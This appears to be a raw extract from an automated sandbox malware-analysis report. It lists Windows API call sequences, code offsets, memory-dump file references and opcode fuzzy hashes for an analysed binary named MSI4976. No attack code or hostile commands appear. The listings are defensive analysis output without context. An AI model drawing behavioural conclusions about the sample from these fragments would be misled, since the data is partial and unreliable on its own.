                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                        • String ID:
                                        • API String ID: 2664167353-0
                                        • Opcode ID: 7335740b810bfa012f87cb1eab517e92e9e01c6cfdb2dd1c2f182fa18239ab9b
                                        • Instruction ID: f30e4db70c79ed4fab739a920663d4795595d6abdd96cf662ece7ae7e6d3ec75
                                        • Opcode Fuzzy Hash: 7335740b810bfa012f87cb1eab517e92e9e01c6cfdb2dd1c2f182fa18239ab9b
                                        • Instruction Fuzzy Hash: 7D11C432104706AFDB23AFA59C41DAF7BE8EF45770B510429FA549E191EB31E8418760
                                        APIs
                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0035B903
                                        • GetLastError.KERNEL32(?,0035B3CB,?,?,?), ref: 0035B90D
                                        • GetProcessHeap.KERNEL32(00000008,?,?,0035B3CB,?,?,?), ref: 0035B91C
                                        • RtlAllocateHeap.NTDLL(00000000,?,0035B3CB), ref: 0035B923
                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0035B93A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                        • String ID:
                                        • API String ID: 883493501-0
                                        • Opcode ID: 9064be3ae05f9b2e81b342e8269113cfe8f029e0c41b77d927e6b8a2cd727441
                                        • Instruction ID: 31eeebfbdb8023a401f116a0a5066564a107466fe24754a22e799c1d6d1edc38
                                        • Opcode Fuzzy Hash: 9064be3ae05f9b2e81b342e8269113cfe8f029e0c41b77d927e6b8a2cd727441
                                        • Instruction Fuzzy Hash: 2B016975201208BFDF124FA5DC88DAB7BADFF8A765B140029F946C2260DB718C44DA60
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00368371
                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0036837F
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00368387
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00368391
                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003683CD
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                        • String ID:
                                        • API String ID: 2833360925-0
                                        • Opcode ID: 2816861fe940d3a6c649cf826cc4f53e4376e832254b7c9c688041414c99fddb
                                        • Instruction ID: b72a43e026eac0c6c1e95d16ed37e89a4d16af431b5863fd32fd47d673554f17
                                        • Opcode Fuzzy Hash: 2816861fe940d3a6c649cf826cc4f53e4376e832254b7c9c688041414c99fddb
                                        • Instruction Fuzzy Hash: F2016939D00619DBCF02AFA4EC48AEEBB7CFB0EB01F114541E402B2654CF709550CBA1
                                        APIs
                                        • CLSIDFromProgID.COMBASE ref: 0035A874
                                        • ProgIDFromCLSID.COMBASE(?,00000000), ref: 0035A88F
                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 0035A89D
                                        • CoTaskMemFree.COMBASE(00000000), ref: 0035A8AD
                                        • CLSIDFromString.COMBASE(?,?), ref: 0035A8B9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                        • String ID:
                                        • API String ID: 3897988419-0
                                        • Opcode ID: 8180e05ff0bd0785aa9a076fcf928358d48275d222a3c14a0206556873edb0bd
                                        • Instruction ID: ff5cc4affc0bf01210b7c386c1ed2c93bf69d3c8d14dc05c482361151c6f1e00
                                        • Opcode Fuzzy Hash: 8180e05ff0bd0785aa9a076fcf928358d48275d222a3c14a0206556873edb0bd
                                        • Instruction Fuzzy Hash: A301DF76600604AFDB024F14EC44B9A7FEDEF44352F104024FC02D6220D730DD04ABA1
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0035B7A5
                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0035B7AF
                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0035B7BE
                                        • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0035B7C5
                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0035B7DB
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                        • String ID:
                                        • API String ID: 47921759-0
                                        • Opcode ID: 702e2fe161fce6d608071d68507598eceebcc25f9fcd87f96b38e06f5b61c3a8
                                        • Instruction ID: 283ee80aceea309cc903a3a28f1424aea321ba896699e9192fc5e122b6acb04d
                                        • Opcode Fuzzy Hash: 702e2fe161fce6d608071d68507598eceebcc25f9fcd87f96b38e06f5b61c3a8
                                        • Instruction Fuzzy Hash: 7DF04F752402046FEB125FA5AC89EB77BACFF8B756F104019F942C7560DB609C458A60
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0035B806
                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0035B810
                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0035B81F
                                        • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 0035B826
                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0035B83C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                        • String ID:
                                        • API String ID: 47921759-0
                                        • Opcode ID: aecaf17714cb951159a7ebc4c8627aebbcf4da0dbb6c67a6a604bcd456bf0cf9
                                        • Instruction ID: 7dfb338c3ca9e338e3b33b6c7b19f551b9f37cf06cb445c2b13366ffa55ec1ba
                                        • Opcode Fuzzy Hash: aecaf17714cb951159a7ebc4c8627aebbcf4da0dbb6c67a6a604bcd456bf0cf9
                                        • Instruction Fuzzy Hash: F3F04975200204AFEB225FA5EC88EAB7B6CFF4B759F000029F942C75A0CB609846CA60
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 0035FA8F
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0035FAA6
                                        • MessageBeep.USER32(00000000), ref: 0035FABE
                                        • KillTimer.USER32(?,0000040A), ref: 0035FADA
                                        • EndDialog.USER32(?,00000001), ref: 0035FAF4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                        • String ID:
                                        • API String ID: 3741023627-0
                                        • Opcode ID: d38086e14cce75f54be7caa155104187cc6f4557f40b7a51eac2eecb389bcf09
                                        • Instruction ID: 560f369ef7ee9e776eaf0dc8f5013b9163d80a774f3e9d7924f9c36ed6ebf8af
                                        • Opcode Fuzzy Hash: d38086e14cce75f54be7caa155104187cc6f4557f40b7a51eac2eecb389bcf09
                                        • Instruction Fuzzy Hash: 1A018130900704AFEB269B14DD4EF9677BCBF05B0AF040169B687A98F0DBF0A9488F51
                                        APIs
                                        • EndPath.GDI32(?), ref: 0033B526
                                        • StrokeAndFillPath.GDI32(?,?,0039F583,00000000,?), ref: 0033B542
                                        • SelectObject.GDI32(?,00000000), ref: 0033B555
                                        • DeleteObject.GDI32 ref: 0033B568
                                        • StrokePath.GDI32(?), ref: 0033B583
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                        • String ID:
                                        • API String ID: 2625713937-0
                                        • Opcode ID: 3e518eee3c88dd6e957bfa4bac375d481eabd063410a167076778d239e545ef1
                                        • Instruction ID: 8890b3c31e50cfe9fa9002f541f951781a504d47a2132c74f517c1677e21f98b
                                        • Opcode Fuzzy Hash: 3e518eee3c88dd6e957bfa4bac375d481eabd063410a167076778d239e545ef1
                                        • Instruction Fuzzy Hash: E3F0C931100288EBDB279F25ED8C7957FE9A712322F188314E5A6885F0C7348996DF11
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 0036FAB2
                                        • CoCreateInstance.COMBASE(003ADA7C,00000000,00000001,003AD8EC,?), ref: 0036FACA
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • CoUninitialize.COMBASE ref: 0036FD2D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                        • String ID: .lnk
                                        • API String ID: 2683427295-24824748
                                        • Opcode ID: 5052a51939134f87063e10bd423169fd80b5f5689fddc91d20cf897d5a4b9dec
                                        • Instruction ID: eaefd9b1728726cf8271e0d6338597f79b3339b178d90fc6e347f60915dcb72f
                                        • Opcode Fuzzy Hash: 5052a51939134f87063e10bd423169fd80b5f5689fddc91d20cf897d5a4b9dec
                                        • Instruction Fuzzy Hash: EDA15B72504301AFD302EF64D891EABB7EDEF88704F40492DF1559B192EB70EA09CB92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #$+
                                        • API String ID: 0-2552117581
                                        • Opcode ID: 79c92045f52041236b81cde19384614a2be492e460fc8ad3f0372e277b83ebb3
                                        • Instruction ID: 7f2663cf50a05dfd849c4dad7230c4b6d5e490bdd387f418eb45aaa6ac1189ec
                                        • Opcode Fuzzy Hash: 79c92045f52041236b81cde19384614a2be492e460fc8ad3f0372e277b83ebb3
                                        • Instruction Fuzzy Hash: 0C510E355042568FDF17EF68E481AFABBA4FF2A310F164056F8929B290D7349D47CB20
                                        APIs
                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,003BDC40,?,0000000F,0000000C,00000016,003BDC40,?), ref: 0036507B
                                          • Part of subcall function 003284A6: __swprintf.LIBCMT ref: 003284E5
                                          • Part of subcall function 003284A6: __itow.LIBCMT ref: 00328519
                                          • Part of subcall function 0032B8A7: _memmove.LIBCMT ref: 0032B8FB
                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 003650FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper$__itow__swprintf_memmove
                                        • String ID: REMOVE$THIS
                                        • API String ID: 2528338962-776492005
                                        • Opcode ID: 644dd466c60b64dddeb622ea1f246475f68853cbe7196e2d222ef5893f1daa39
                                        • Instruction ID: c86ce9490017f66d0146b319016e0321cf8d4af45161316c834e8a297bdcb18e
                                        • Opcode Fuzzy Hash: 644dd466c60b64dddeb622ea1f246475f68853cbe7196e2d222ef5893f1daa39
                                        • Instruction Fuzzy Hash: 0E419075A00619AFCF06EF64C881AAEB7B9BF49304F04C469E856AF356DB34DD41CB50
                                        APIs
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003BDBF0,00000000,?,?,?,?), ref: 0038A4E6
                                        • GetWindowLongW.USER32 ref: 0038A503
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0038A513
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID: SysTreeView32
                                        • API String ID: 847901565-1698111956
                                        • Opcode ID: 48d84b47ece7f466de7bea74ed28a0570bc80a6b3d4fbaa9edff423e0745c7d5
                                        • Instruction ID: 21b2ff6d46511ce23e75739856876e7f5827097e40503393055f32165aafea05
                                        • Opcode Fuzzy Hash: 48d84b47ece7f466de7bea74ed28a0570bc80a6b3d4fbaa9edff423e0745c7d5
                                        • Instruction Fuzzy Hash: 2331B231200A05AFEF12AF38CC45BEA7B69EB49324F254715F9B5932E0D770E8509B50
                                        APIs
                                        • _memset.LIBCMT ref: 003757E7
                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 0037581D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CrackInternet_memset
                                        • String ID: ?K7$|
                                        • API String ID: 1413715105-540616914
                                        • Opcode ID: 3e6d5c83ec0e5cd8fef205ce23bb4c68e9ca9eebf65c0910b22576c19a32798f
                                        • Instruction ID: 7541de09d629a3d31f449163c499adc9f5e00f48dd0829f209831a9723bfed9f
                                        • Opcode Fuzzy Hash: 3e6d5c83ec0e5cd8fef205ce23bb4c68e9ca9eebf65c0910b22576c19a32798f
                                        • Instruction Fuzzy Hash: 39313D71901219FBCF16AFA1DC55DEE7FB8FF18300F108019F815AA161DB359A56CBA0
                                        APIs
                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0038A74F
                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0038A75D
                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0038A764
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$DestroyWindow
                                        • String ID: msctls_updown32
                                        • API String ID: 4014797782-2298589950
                                        • Opcode ID: 205aeebd5a0f945c88e37d8b9898b65f826096dc1163f7b74091272234615016
                                        • Instruction ID: 7deb9d558464ed3c7a269b3a809ec762d4bcfcb08abf24f950871f6e240b009f
                                        • Opcode Fuzzy Hash: 205aeebd5a0f945c88e37d8b9898b65f826096dc1163f7b74091272234615016
                                        • Instruction Fuzzy Hash: A321B2B5600605AFEB12EF64CCC1EA737ACEB4A394F05015AF9019B2A1C770EC11DB61
                                        APIs
                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0038983D
                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0038984D
                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00389872
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$MoveWindow
                                        • String ID: Listbox
                                        • API String ID: 3315199576-2633736733
                                        • Opcode ID: 790503f119fc73aadedf24778b784800dff1fb0bb8145ef7c81180b7908f5b65
                                        • Instruction ID: 7cfce20d17999b634706af6a2050b8575aac4d34205436357c12a92ae95d7d9f
                                        • Opcode Fuzzy Hash: 790503f119fc73aadedf24778b784800dff1fb0bb8145ef7c81180b7908f5b65
                                        • Instruction Fuzzy Hash: C221F632610218BFEF139F54CC85FBB3BAEEF8A754F068165F9059B1A0C6719C518BA0
                                        APIs
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0035C3BF
                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0035C3D6
                                        • SendMessageW.USER32(?,0000000D,?,00000000), ref: 0035C40E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: @U=u
                                        • API String ID: 3850602802-2594219639
                                        • Opcode ID: 98c03277f3f449acf5eca6ded74a1552b441fa82f1155e5084e5da0df67a23c0
                                        • Instruction ID: 8db4acd68ef0011a13543c949d2f3916e38e3b8789edb917b5aff38835886f0c
                                        • Opcode Fuzzy Hash: 98c03277f3f449acf5eca6ded74a1552b441fa82f1155e5084e5da0df67a23c0
                                        • Instruction Fuzzy Hash: 0121CF72610218BFDB16DB99C882DAEB7BEEF44304F211456E805E7160D670AE048AA0
                                        APIs
